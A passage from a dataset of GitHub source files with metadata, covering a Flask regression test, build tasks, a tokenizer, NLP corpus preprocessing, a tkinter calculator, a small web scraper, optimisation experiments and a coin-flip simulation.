    ')\n\n # Trigger caches\n fire()\n\n # This test only works on CPython 2.7.\n if sys.version_info >= (2, 7) and \\\n not hasattr(sys, 'pypy_translation_info'):\n with self.assert_no_leak():\n for x in xrange(10):\n fire()\n\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(MemoryTestCase))\n return suite\n","repo_name":"deepgully/me","sub_path":"libs/flask/testsuite/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"72"} +{"seq_id":"3236297774","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'robert'\n\nimport sys\nimport os\nimport logging\nlogger = logging.getLogger('weizoom-merge')\n\nfrom prunt.decorator import register_task\nfrom prunt.util import template_util\nimport prunt\n\n@register_task('weizoom-merge')\ndef weizoomMerge(prunt):\n\tu\"\"\"\n\t将js, css���件进行concat和uglify操作\n\t\"\"\"\n\tprunt.config.require('files')\n\tfiles = prunt.config['files']\n\tpaths = files['src'] if type(files['src']) == list else [files['src']]\n\n\tprunt.config.require('dest')\n\tdest = prunt.config['dest']\n\n\tpath_map = prunt.config.get('path_map', None)\n\n\tlogger.info('merge %s', paths)\n\n\tprunt.run_task('prunt-concat', {\n\t\t\"files\": {\n\t\t\t\"src\": paths,\n\t\t\t\"dest\": dest\n\t\t},\n\t\t\"comment\": \"/* comment */\",\n\t\t\"path_map\": path_map\n\t})\n\n\tsrc = dest\n\tprunt.run_task('prunt-md5', {\n\t\t\"files\": {\n\t\t\t\"src\": src\n\t\t}\n\t})\n\n\tsrc = prunt.get_last_result()\n\tprunt.run_task('prunt-uglify', {\n\t\t\"files\": {\n\t\t\t\"src\": src\n\t\t}\n\t})\n","repo_name":"chengdg/weizoom","sub_path":"weapp/prunt/builtin/weizoom_merge/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29203513555","text":"class Solution:\n def removeDuplicates_my(self, nums):\n nums_len = len(nums)\n if nums_len <= 1: return nums_len\n index_before = 0\n\n for i in range(1, nums_len):\n if nums[i] != nums[index_before]:\n index_before+=1\n nums[index_before] = nums[i]\n\n return index_before+1\n def removeDuplicates(self, nums):\n before_num = None\n re_len = 0\n for num in nums:\n if num != before_num:\n nums[re_len] = num\n before_num = num\n re_len+=1\n\n return re_len\n\nnums = [1,1,2]\n\ns = Solution()\nn = s.removeDuplicates(nums)\nprint(nums[:n])\n ","repo_name":"huangshiyu13/AlgProblems","sub_path":"leetcode/26. Remove Duplicates from Sorted Array/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32017721527","text":"import translators as ts\nimport logging\n\nfrom aiogram.types import InputFile\n\nfrom loader import dp\nfrom db.words import get_random_word, get_translation_choices\nfrom keyboards.inline import translate_choices_kb\nfrom states.user import TranslateWord\nfrom .image_word import create_new_image\n\n\nasync def translate_word(telegram_id: int) -> bool:\n # добавить добавление текущего слова во временный список, чтобы нельзя было запустить много слов (одинаковые)\n word: str | None = get_random_word()\n if not word:\n logging.error(f'Error all words translated: {word}')\n # добавить обнуление при переводе всех слов !!!!!\n await dp.bot.send_message(telegram_id, 'Ошибка! Ты перевел уже все слова!')\n return False\n else:\n translate_choices: list = get_translation_choices(word)\n if not translate_choices:\n logging.error(f'Error no translate choices: {translate_choices}, {word}')\n await dp.bot.send_message(telegram_id, 'Ошибка! Ты перевел уже все слова!')\n return False\n else:\n image: str = create_new_image(word)\n msg = await dp.bot.send_photo(telegram_id, InputFile(image),\n reply_markup=translate_choices_kb(word, translate_choices))\n cur_state = dp.current_state(chat=telegram_id, user=telegram_id)\n await cur_state.set_state(TranslateWord.active)\n await cur_state.update_data(message_id=msg.message_id)\n return True\n\n\ndef google_translate_word(word: str) -> str:\n try:\n translation: str = ts.google(word, from_language='en', to_language='ru')\n except Exception as ex:\n logging.error(f'Error google translate: {ex}')\n translation: str = 'отсутствует'\n return translation\n","repo_name":"bridges123/eng_learn_bot","sub_path":"services/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13574207278","text":"\"\"\"\n author:jjk\n datetime:2019/9/22\n coding:utf-8\n project name:Pycharm_workstation\n Program function: 中文语料处理\n\n 维基百科提供的语料是xml格式的,因此需要将其转化为txt格式。\n 由于维基百科中有很多繁体中文网页,所以也需要将这些繁体字转化为简体字。\n 另外,再用语料库训练词向量之前需要对中文句子进行分词,这里我就循规蹈矩的用很成熟的jieba分词吧(关于分词可以浏览博主博客:分词1,,分词2)\n\n\"\"\"\n\nimport jieba\nfrom gensim.corpora import WikiCorpus\n#from util.langconv import *\nfrom langconv import *\n\n\ndef my_function():\n space = ' '\n i = 0\n l = []\n zhwiki_name = './yuliao/zhwiki-latest-pages-articles.xml.bz2'.encode('utf-8')# 中文语料\n f = open('./yuliao/reduce_zhiwiki.txt','w',encoding='utf-8') # 创建文件reduce_zhiwiki用来将原始语料xml格式转化为txt格式\n wiki = WikiCorpus(zhwiki_name,lemmatize=False,dictionary={})\n for text in wiki.get_texts():\n for temp_sentence in text:\n # zh-hans:将繁体转换成简体\n # zh-hant:将简体转换成繁体\n temp_sentence = Converter('zh-hans').convert(temp_sentence) # 每行转换成简体\n #temp_sentence.enconde('utf-8')\n seg_list = list(jieba.cut(temp_sentence)) # 转换过来的每行简体-然后结巴分词\n for temp_term in seg_list:\n temp_term.encode('utf-8')\n l.append(temp_term) # 结巴分词完毕之后添加到l中\n\n f.write(space.join(l) + '\\n')\n l = []\n i = i+1\n if (i % 200 ==0):\n print('Saved' + str(i) + 'articles')\n f.close() # 关闭文件指针\n\nif __name__ == '__main__':\n my_function()","repo_name":"jiajikang-nlp/NLP-related-algorithm-learning","sub_path":"[3]NLP related algorithm learning/word2vec/data_pre_process.py","file_name":"data_pre_process.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"83741519","text":"import pytest\n\nimport yatest.common\nimport yt.wrapper as yt\n\nfrom crypta.lib.python import yaml_config\nfrom crypta.lib.python.yt.test_helpers import (\n tables,\n tests\n)\n\n\n@pytest.fixture(scope=\"function\")\ndef config(yt_stuff):\n return {\n \"yt-proxy\": yt_stuff.get_server(),\n \"yt-pool\": \"crypta_adobe\",\n\n \"typed-yandexuid-bindings-dir\": \"//adobe/typed_yandexuid_bindings\",\n \"all-types-yandexuid-bindings-table\": \"//adobe/all_types_yandexuid_bindings\"\n }\n\n\ndef get_input_table_test(config, name):\n on_write = tables.OnWrite(sort_by=\"yandexuid\")\n return tables.YsonTable(name, yt.ypath_join(config[\"typed-yandexuid-bindings-dir\"], name), on_write=on_write), tests.Exists()\n\n\ndef test_merge_yandexuid_bindings_multiple_tables(yt_stuff, config):\n config_path = yaml_config.dump(config)\n\n return tests.yt_test(\n yt_client=yt_stuff.get_yt_client(),\n binary=yatest.common.binary_path(\"crypta/dmp/adobe/bin/merge_yandexuid_bindings/bin/crypta-adobe-merge-yandexuid-bindings\"),\n args=[\"--config\", config_path],\n data_path=yatest.common.test_source_path(\"data\"),\n input_tables=[\n get_input_table_test(config, \"yandexuid_bindings__type_1\"),\n get_input_table_test(config, \"yandexuid_bindings__type_2\")\n ],\n output_tables=[\n (tables.YsonTable(\"dst_table\", config[\"all-types-yandexuid-bindings-table\"], yson_format=\"pretty\"), tests.Diff())\n ]\n )\n\n\ndef test_merge_yandexuid_bindings_one_table(yt_stuff, config):\n config_path = yaml_config.dump(config)\n\n return tests.yt_test(\n yt_client=yt_stuff.get_yt_client(),\n binary=yatest.common.binary_path(\"crypta/dmp/adobe/bin/merge_yandexuid_bindings/bin/crypta-adobe-merge-yandexuid-bindings\"),\n args=[\"--config\", config_path],\n data_path=yatest.common.test_source_path(\"data\"),\n input_tables=[\n get_input_table_test(config, \"yandexuid_bindings__type_1\")\n ],\n output_tables=[\n (tables.YsonTable(\"dst_table\", config[\"all-types-yandexuid-bindings-table\"], yson_format=\"pretty\"), tests.Diff())\n ]\n )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test/main (10).py","file_name":"main (10).py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5025223184","text":"#!/usr/bin/env python\n\nimport csv\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef main():\n parser = argparse.ArgumentParser(description='read result from csv')\n parser.add_argument('file_name', metavar='file_name', type=str, help='input file name')\n args = parser.parse_args()\n print(args.file_name)\n\n results = np.loadtxt(args.file_name, delimiter=',')\n print(results)\n\n print(\"ave. traveled distance: \" + str(results[:, 0].mean()) + \"[m]\")\n print(\"ave. traveled time: \" + str(results[:, 1].mean()) + \"[s]\")\n print(\"ave. collision count: \" + str(results[:, 2].mean()))\n\n fig, ax = plt.subplots()\n bp = ax.boxplot(results)\n ax.set_xticklabels(['traveled distance', 'traveled time', 'collision count', 'min distance'])\n plt.grid()\n plt.show()\n\nif __name__==\"__main__\":\n main()\n","repo_name":"Taka-Kazu/slp_doa","sub_path":"slp_doa/scripts/result_reader.py","file_name":"result_reader.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"27620160544","text":"from tkinter import*\r\nimport math\r\n\r\nclass Kalkulator:\r\n def __init__(self, okno):\r\n self.okno = okno\r\n self.prikazno_okno = StringVar()\r\n self.stevilo1 = ''\r\n self.stevilo2 = ''\r\n self.operator = ''\r\n self.drugi_operatorji = ''\r\n self.pripravi_graficni_vmesnik(okno)\r\n \r\n\r\n #V okno postavi gumbe\r\n def pripravi_graficni_vmesnik(self, okno):\r\n Entry(self.okno, textvariable=self.prikazno_okno, width=30).grid(columnspan=4) #Polje\r\n\r\n #Števila od 0 do 9\r\n Button(self.okno, text='1', height=1, width=5, command = lambda: self.znak('1')).grid(row=1, column=0)\r\n Button(self.okno, text='2', height=1, width=5, command = lambda: self.znak('2')).grid(row=1, column=1)\r\n Button(self.okno, text='3', height=1, width=5, command = lambda: self.znak('3')).grid(row=1, column=2)\r\n Button(self.okno, text='4', height=1, width=5, command = lambda: self.znak('4')).grid(row=2, column=0)\r\n Button(self.okno, text='5', height=1, width=5, command = lambda: self.znak('5')).grid(row=2, column=1)\r\n Button(self.okno, text='6', height=1, width=5, command = lambda: self.znak('6')).grid(row=2, column=2)\r\n Button(self.okno, text='7', height=1, width=5, command = lambda: self.znak('7')).grid(row=3, column=0)\r\n Button(self.okno, text='8', height=1, width=5, command = lambda: self.znak('8')).grid(row=3, column=1)\r\n Button(self.okno, text='9', height=1, width=5, command = lambda: self.znak('9')).grid(row=3, column=2)\r\n Button(self.okno, text='0', height=1, width=5, command = lambda: self.znak('0')).grid(row=4, column=0)\r\n\r\n Button(self.okno, text='', height=1, width=5).grid(row=4, column=1)\r\n\r\n #Operacije, ki jih racunalo zna izracunati\r\n Button(self.okno, text='+', height=1, width=5, command = lambda: self.znak('+')).grid(row=1, column=3)\r\n Button(self.okno, text='-', height=1, width=5, command = lambda: self.znak('-')).grid(row=2, column=3)\r\n Button(self.okno, text='*', height=1, width=5, command = lambda: self.znak('*')).grid(row=3, column=3)\r\n Button(self.okno, text='/', height=1, width=5, command = lambda: self.znak('/')).grid(row=4, column=3)\r\n Button(self.okno, text='^2', height=1, width=5, command = lambda: self.znak('^2')).grid(row=2, column=4)\r\n Button(self.okno, text='^1/2', height=1, width=5, command = lambda: self.znak('^1/2')).grid(row=3, column=4)\r\n Button(self.okno, text='1/[]', height=1, width=5, command = lambda: self.znak('1/')).grid(row=4, column=4)\r\n\r\n Button(self.okno, text='', height=1, width=5).grid(row=4, column=2)\r\n Button(self.okno, text='', height=1, width=5).grid(row=5, column=2)\r\n\r\n Button(self.okno, text='=', height=3, width=5, command=lambda:self.izracunati()).grid(row=4, column=2, rowspan=2)\r\n\r\n #Gumba za izbris izraza v polju\r\n Button(self.okno, text='AC', height=1, width=12, command = lambda: self.pobrisi()).grid(row=5, column=0, columnspan=2)\r\n Button(self.okno, text='C', height=1, width=12, command = lambda: self.brisi()).grid(row=5, column=3, columnspan=2)\r\n\r\n #Gumb za shranitev izracunanega izraza\r\n Button(self.okno, text='SHRANI', height=1, width=5, command = lambda: self.shrani_v_datoteko('shraniti.txt')).grid(row=0,column=4, columnspan=2)\r\n\r\n #Funkcija v polje vpiše izraz\r\n def znak(self, text):\r\n self.prikazno_okno.set(self.prikazno_okno.get() + text)\r\n self.prikaz_racuna(text)\r\n\r\n #Funkcija nastavi stevilo1, stevilo2 in katera operacija je med njima \r\n def prikaz_racuna(self, text):\r\n if text in '+-*/':\r\n self.operator += text\r\n if text == '^2' or text == '^1/2' or text == '1/':\r\n self.drugi_operatorji += text\r\n if len(self.operator) == 0 and len(self.drugi_operatorji) == 0:\r\n if text in '1234567890':\r\n self.stevilo1 += text\r\n if len(self.operator) == 1 or self.drugi_operatorji != '^2' or self.drugi_operatorji == '1/' or self.drugi_operatorji != '^1/2':\r\n if text in '1234567890':\r\n self.stevilo2 += text\r\n if len(self.operator) > 1 or len(self.drugi_operatorji) > 4:\r\n self.pobrisi()\r\n \r\n \r\n\r\n #Funkcija pobrise celoten izraz in ponovno nastavi racunalo\r\n def pobrisi(self):\r\n self.prikazno_okno.set('')\r\n self.ponastavi()\r\n\r\n #Funcija brise vsako stevko stevilke posebej\r\n def brisi(self):\r\n self.prikazno_okno.set(self.prikazno_okno.get()[:-1])\r\n\r\n #Funcija ponastavi vse parametre\r\n def ponastavi(self):\r\n self.operator = ''\r\n self.drugi_operatorji = ''\r\n self.stevilo1 = ''\r\n self.stevilo2 = ''\r\n\r\n #Funkcija izračuna izraz in ga izpiše v polju\r\n def izracunati(self):\r\n stevilo1 = int(self.stevilo1)\r\n dolzina=len(self.stevilo1)\r\n stevilo2 = int(self.stevilo2[dolzina:])\r\n if self.operator == '+':\r\n self.prikazno_okno.set(stevilo1 + stevilo2)\r\n self.ponastavi()\r\n if self.operator == '-':\r\n self.prikazno_okno.set(stevilo1 - stevilo2)\r\n self.ponastavi()\r\n if self.operator == '*':\r\n self.prikazno_okno.set(stevilo1 * stevilo2)\r\n self.ponastavi()\r\n if self.operator == '/':\r\n self.prikazno_okno.set(stevilo1 / stevilo2)\r\n self.ponastavi()\r\n if self.drugi_operatorji == '^1/2':\r\n self.prikazno_okno.set(math.sqrt(stevilo1))\r\n self.ponastavi()\r\n if self.drugi_operatorji == '^2':\r\n self.prikazno_okno.set(stevilo1 ** 2)\r\n self.ponastavi()\r\n if self.drugi_operatorji == '1/':\r\n self.prikazno_okno.set(1 / stevilo1)\r\n self.ponastavi()\r\n\r\n #Funkcija izracuna izraz, ne zna računati, če je več operatorjev hkrati\r\n def rezultat(self):\r\n if self.operator == '+':\r\n return(int(self.stevilo1) + int(self.stevilo2))\r\n if self.operator == '-':\r\n return(int(self.stevilo1) - int(self.stevilo2))\r\n if self.operator == '*':\r\n return(int(self.stevilo1) * int(self.stevilo2))\r\n if self.operator == '/':\r\n return(int(self.stevilo1) / int(self.stevilo2))\r\n if self.drugi_operatorji == '^1/2':\r\n return(math.sqrt(int(self.stevilo1)))\r\n if self.drugi_operatorji == '^2':\r\n return(int(self.stevilo1) ** 2)\r\n if self.drugi_operatorji == '1/':\r\n return(1 / int(self.stevilo1))\r\n\r\n #Funkcija shrani seloten izraz skupaj z rezultatom\r\n def shrani_v_datoteko(self, shrani_rezultate):\r\n with open(shrani_rezultate, 'a') as dat:\r\n if self.operator == '+' or self.operator == '-' or self.operator == '*' or self.operator == '/':\r\n print(self.stevilo1, self.operator, self.stevilo2, '=', self.rezultat(), end='\\n', file=dat)\r\n if self.drugi_operatorji == '^':\r\n print(self.stevilo1, self.drugi_operatorji, self.stevilo2, '=', self.rezultat(), end='\\n', file=dat)\r\n if self.drugi_operatorji in '^1/2':\r\n print(self.stevilo1, self.drugi_operatorji, '=', self.rezultat(), end='\\n', file=dat)\r\n if self.drugi_operatorji in '^2':\r\n print(self.stevilo1, self.drugi_operatorji, '=', self.rezultat(), end='\\n', file=dat)\r\n if self.drugi_operatorji in '1/':\r\n print(self.drugi_operatorji, self.stevilo2, '=', self.rezultat(), end='\\n', file=dat)\r\n if self.drugi_operatorji == '':\r\n print(self.stevilo1, end='\\n', file=dat)\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\nokno = Tk() \r\nmoj_program = Kalkulator(okno) \r\nokno.mainloop() \r\n","repo_name":"SashaOslaj/Kalkulator","sub_path":"kalkulator.py","file_name":"kalkulator.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74322707111","text":"import sys\nsys.path.append('../')\nimport configparser\nimport os\nimport networkx as nx\nimport pandas as pd\nimport multiprocessing as mp\nfrom functools import partial\nimport influence.power_influence as power\n\n\nif __name__ == \"__main__\":\n\n cf = configparser.ConfigParser()\n cf.read(\"file_path.properties\")\n path = dict(cf.items(\"file_path\"))\n directory = path['dartmouth']\n directory = directory+\"graphs/\"\n\n H = nx.read_gml(directory+\"inf_dartmouth_02-11-03.gml\")\n print(\"computing support power\")\n support = power.power_support_influence(H)\n file_name = \"support_dartmouth_02-11-03.gml\"\n print('saving graph %s' % file_name)\n nx.write_gml(support, directory + file_name)\n print(\"computing attract power\")\n attract = power.power_attract_influence(H)\n file_name = \"attract_dartmouth_02-11-03.gml\"\n print('saving graph %s' % file_name)\n nx.write_gml(attract, directory + file_name)\n file_name = \"dartmouth_02-11-03.csv\"","repo_name":"lucasant10/influence","sub_path":"dartmouth/dartmouth_power.py","file_name":"dartmouth_power.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22687270828","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nfrom tensorflow import keras\nimport numpy as np\nfrom konlpy.tag import Twitter\nfrom collections import Counter\nfrom threading import Thread\n\n\nclass Vocabulary(object):\n \"\"\"Vocab Class\"\"\"\n\n def __init__(self, token_to_idx=None):\n\n self.token_to_idx = {}\n self.idx_to_token = {}\n self.idx = 0\n\n self.PAD = self.padding_token = \"[PAD]\"\n self.START_TOKEN = \"\"\n self.END_TOKEN = \"\"\n self.UNK = \"[UNK]\"\n self.CLS = \"[CLS]\"\n self.MASK = \"[MASK]\"\n self.SEP = \"[SEP]\"\n self.SEG_A = \"[SEG_A]\"\n self.SEG_B = \"[SEG_B]\"\n self.NUM = \"\"\n\n self.cls_token = self.CLS\n self.sep_token = self.SEP\n\n self.special_tokens = [self.PAD,\n self.START_TOKEN,\n self.END_TOKEN,\n self.UNK,\n self.CLS,\n self.MASK,\n self.SEP,\n self.SEG_A,\n self.SEG_B,\n self.NUM]\n self.init_vocab()\n\n if token_to_idx is not None:\n self.token_to_idx = token_to_idx\n self.idx_to_token = {v: k for k, v in token_to_idx.items()}\n self.idx = len(token_to_idx) - 1\n\n # if pad token in token_to_idx dict, get pad_id\n if self.PAD in self.token_to_idx:\n self.PAD_ID = self.transform_token2idx(self.PAD)\n else:\n self.PAD_ID = 0\n\n def init_vocab(self):\n for special_token in self.special_tokens:\n self.add_token(special_token)\n self.PAD_ID = self.transform_token2idx(self.PAD)\n\n def __len__(self):\n return len(self.token_to_idx)\n\n def to_indices(self, tokens):\n return [self.transform_token2idx(X_token) for X_token in tokens]\n\n def add_token(self, token):\n if not token in self.token_to_idx:\n self.token_to_idx[token] = self.idx\n self.idx_to_token[self.idx] = token\n self.idx += 1\n\n def transform_token2idx(self, token, show_oov=False):\n try:\n return self.token_to_idx[token]\n except:\n if show_oov is True:\n print(\"key error: \" + str(token))\n token = self.UNK\n return self.token_to_idx[token]\n\n def transform_idx2token(self, idx):\n try:\n return self.idx_to_token[idx]\n except:\n print(\"key error: \" + str(idx))\n idx = self.token_to_idx[self.UNK]\n return self.idx_to_token[idx]\n\n def build_vocab(self, list_of_str, threshold=1, vocab_save_path=\"./data_in/token_vocab.json\",\n split_fn=Twitter().morphs):\n \"\"\"Build a token vocab\"\"\"\n\n def do_concurrent_tagging(start, end, text_list, counter):\n for i, text in enumerate(text_list[start:end]):\n text = text.strip()\n text = text.lower()\n\n try:\n tokens_ko = split_fn(text)\n # tokens_ko = [str(pos[0]) + '/' + str(pos[1]) for pos in tokens_ko]\n counter.update(tokens_ko)\n\n if i % 1000 == 0:\n print(\"[%d/%d (total: %d)] Tokenized input text.\" % (\n start + i, start + len(text_list[start:end]), len(text_list)))\n\n except Exception as e: # OOM, Parsing Error\n print(e)\n continue\n\n counter = Counter()\n\n num_thread = 4\n thread_list = []\n num_list_of_str = len(list_of_str)\n for i in range(num_thread):\n thread_list.append(Thread(target=do_concurrent_tagging, args=(\n int(i * num_list_of_str / num_thread), int((i + 1) * num_list_of_str / num_thread), list_of_str,\n counter)))\n\n for thread in thread_list:\n thread.start()\n\n for thread in thread_list:\n thread.join()\n\n # vocab_report\n print(counter.most_common(10)) # print most common tokens\n tokens = [token for token, cnt in counter.items() if cnt >= threshold]\n\n for i, token in enumerate(tokens):\n self.add_token(str(token))\n\n print(\"len(self.token_to_idx): \", len(self.token_to_idx))\n\n import json\n with open(vocab_save_path, 'w', encoding='utf-8') as f:\n json.dump(self.token_to_idx, f, ensure_ascii=False, indent=4)\n\n return self.token_to_idx\n\n\n\n# def keras_pad_fn(token_ids_batch, maxlen, pad_id=0, padding='post', truncating='post'):\n# padded_token_ids_batch = keras.preprocessing.sequence.pad_sequences(token_ids_batch,\n# value=pad_id, # vocab.transform_token2idx(PAD),\n# padding=padding,\n# truncating=truncating,\n# maxlen=maxlen)\n# return np.array(padded_token_ids_batch)\n\n\nclass Tokenizer:\n \"\"\" Tokenizer class\"\"\"\n\n def __init__(self, vocab, split_fn, pad_fn, maxlen):\n self._vocab = vocab\n self._split = split_fn\n self._pad = pad_fn\n self._maxlen = maxlen\n\n # def split(self, string: str) -> list[str]:\n def split(self, string):\n tokens = self._split(string)\n return tokens\n\n # def transform(self, list_of_tokens: list[str]) -> list[int]:\n def transform(self, tokens):\n indices = self._vocab.to_indices(tokens)\n pad_indices = self._pad(indices, pad_id=0, maxlen=self._maxlen) if self._pad else indices\n return pad_indices\n\n # def split_and_transform(self, string: str) -> list[int]:\n def split_and_transform(self, string):\n return self.transform(self.split(string))\n\n @property\n def vocab(self):\n return self._vocab\n\n def list_of_tokens_to_list_of_token_ids(self, X_token_batch):\n X_ids_batch = []\n for X_tokens in X_token_batch:\n X_ids_batch.append([self._vocab.transform_token2idx(X_token) for X_token in X_tokens])\n return X_ids_batch\n\n def list_of_string_to_list_of_tokens(self, X_str_batch):\n X_token_batch = [self._split(X_str) for X_str in X_str_batch]\n return X_token_batch\n\n def list_of_tokens_to_list_of_token_ids(self, X_token_batch):\n X_ids_batch = []\n for X_tokens in X_token_batch:\n X_ids_batch.append([self._vocab.transform_token2idx(X_token) for X_token in X_tokens])\n return X_ids_batch\n\n def list_of_string_to_list_token_ids(self, X_str_batch):\n X_token_batch = self.list_of_string_to_list_of_tokens(X_str_batch)\n X_ids_batch = self.list_of_tokens_to_list_of_token_ids(X_token_batch)\n\n return X_ids_batch\n\n def list_of_string_to_arr_of_pad_token_ids(self, X_str_batch, add_start_end_token=False):\n X_token_batch = self.list_of_string_to_list_of_tokens(X_str_batch)\n # print(\"X_token_batch: \", X_token_batch)\n if add_start_end_token is True:\n return self.add_start_end_token_with_pad(X_token_batch)\n else:\n X_ids_batch = self.list_of_tokens_to_list_of_token_ids(X_token_batch)\n pad_X_ids_batch = self._pad(X_ids_batch, pad_id=self._vocab.PAD_ID, maxlen=self._maxlen)\n\n return pad_X_ids_batch\n\n def list_of_tokens_to_list_of_cls_sep_token_ids(self, X_token_batch):\n X_ids_batch = []\n for X_tokens in X_token_batch:\n X_tokens = [self._vocab.cls_token] + X_tokens + [self._vocab.sep_token]\n X_ids_batch.append([self._vocab.transform_token2idx(X_token) for X_token in X_tokens])\n return X_ids_batch\n\n def list_of_string_to_arr_of_cls_sep_pad_token_ids(self, X_str_batch):\n X_token_batch = self.list_of_string_to_list_of_tokens(X_str_batch)\n X_ids_batch = self.list_of_tokens_to_list_of_cls_sep_token_ids(X_token_batch)\n pad_X_ids_batch = self._pad(X_ids_batch, pad_id=self._vocab.PAD_ID, maxlen=self._maxlen)\n\n return pad_X_ids_batch\n\n def list_of_string_to_list_of_cls_sep_token_ids(self, X_str_batch):\n X_token_batch = self.list_of_string_to_list_of_tokens(X_str_batch)\n X_ids_batch = self.list_of_tokens_to_list_of_cls_sep_token_ids(X_token_batch)\n\n return X_ids_batch\n\n def add_start_end_token_with_pad(self, X_token_batch):\n dec_input_token_batch = [[self._vocab.START_TOKEN] + X_token for X_token in X_token_batch]\n dec_output_token_batch = [X_token + [self._vocab.END_TOKEN] for X_token in X_token_batch]\n\n dec_input_token_batch = self.list_of_tokens_to_list_of_token_ids(dec_input_token_batch)\n pad_dec_input_ids_batch = self._pad(dec_input_token_batch, pad_id=self._vocab.PAD_ID, maxlen=self._maxlen)\n\n dec_output_ids_batch = self.list_of_tokens_to_list_of_token_ids(dec_output_token_batch)\n pad_dec_output_ids_batch = self._pad(dec_output_ids_batch, pad_id=self._vocab.PAD_ID, maxlen=self._maxlen)\n return pad_dec_input_ids_batch, pad_dec_output_ids_batch\n\n def decode_token_ids(self, token_ids_batch):\n list_of_token_batch = []\n for token_ids in token_ids_batch:\n token_token = [self._vocab.transform_idx2token(token_id) for token_id in token_ids]\n # token_token = [self._vocab[token_id] for token_id in token_ids]\n list_of_token_batch.append(token_token)\n return list_of_token_batch\n\n\ndef main():\n print(\"안녕하세요\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"eagle705/pytorch-bert-crf-ner","sub_path":"data_utils/vocab_tokenizer.py","file_name":"vocab_tokenizer.py","file_ext":"py","file_size_in_byte":9808,"program_lang":"python","lang":"en","doc_type":"code","stars":457,"dataset":"github-code","pt":"72"} +{"seq_id":"19190671730","text":"import numpy as np \nimport matplotlib.pyplot as plt\nfrom scipy.optimize import rosen, differential_evolution, minimize\nfrom scipy import stats\n\n# converges to a very small tolerance, something like 10^-19\n# num_seeds = 10\n\n# for d in range(2,21): # loop over problem dimension\n# for seed in range(num_seeds):\n# np.random.seed(seed)\n# bounds = [(0,2)]*d\n# result = differential_evolution(rosen, bounds, polish=False)\n# # result = minimize(rosen, x0=np.random.uniform(0,2,d), bounds=bounds)\n# print('%d %d %d' % (d,seed,result.nfev))\n\n\n# after running all of that and saving it to text files...\n\nA = np.loadtxt('data/de-scaling-results.txt')\n# A = np.loadtxt('data/bfgs-scaling-results.txt')\n\nx = np.log(A[:,0])\ny = np.log(A[:,2])\nplt.scatter(x,y)\n\nslope,intercept,rvalue,pvalue,stderr = stats.linregress(x,y)\n\nplt.plot([np.min(x), np.max(x)], [intercept + np.min(x)*slope, intercept + np.max(x)*slope], color='indianred', linewidth=2)\nplt.text(1.0,10, 'slope = %0.2f' % slope, fontsize=16)\n\nplt.xlabel('# Decision Variables')\nplt.ylabel('NFE to converge')\nplt.title('DE - Rosenbrock function')\nplt.show()","repo_name":"jdherman/eci263","sub_path":"L13-scalability-scipy.py","file_name":"L13-scalability-scipy.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"14989913929","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\n\n \n\n\ndef scrape_english(): \n print(\"오늘의 영어 회화\")\n url = \"https://www.hackers.co.kr/?c=s_eng/eng_contents/I_others_english&keywd=haceng_submain_lnb_eng_I_others_english&logger_kw=haceng_submain_lnb_eng_I_others_english#;\"\n res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'})\n soup = BeautifulSoup(res.text,\"lxml\")\n sentences = soup.find_all(\"div\",attrs={\"id\":re.compile(\"^conv_kor_t\")})\n\n\n print(\"영어 지문\")\n for sentence in sentences[len(sentences)//2:]:\n print(sentence.get_text().strip())\n\n print()\n\n print(\"한글 지문\")\n for sentence in sentences[:len(sentences)//2]:\n print(sentence.get_text().strip())\n\nif __name__ == \"__main__\":\n scrape_english() # 오늘의 영어 회화 가져오기\n","repo_name":"JinSuJinSu/Python-web-crawling","sub_path":"web-crawling4.py","file_name":"web-crawling4.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32064979357","text":"\"\"\"\n Aula 01 - \nLançamento de uma moeda justa: S = {h, t} => P(h) = P(t) = 1/2\n\ne = {sair h}\n\nLançamento de duas moedas não viciadas.\ne = {ambas sairem h}\n\nLançamento de um dado e de uma moeda, ambos justos.\ne = {sair t na moeda e 3 no dado}\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef coin_flip_experiment():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n coin_1 = ['h', 't']\n coin_2 = ['h', 't']\n \n flip_result_1 = np.random.choice(coin_1)\n flip_result_2 = np.random.choice(coin_2)\n\n if flip_result_1 == 'h' and flip_result_2 == 'h':\n return 1\n else:\n return 0\n\ndef 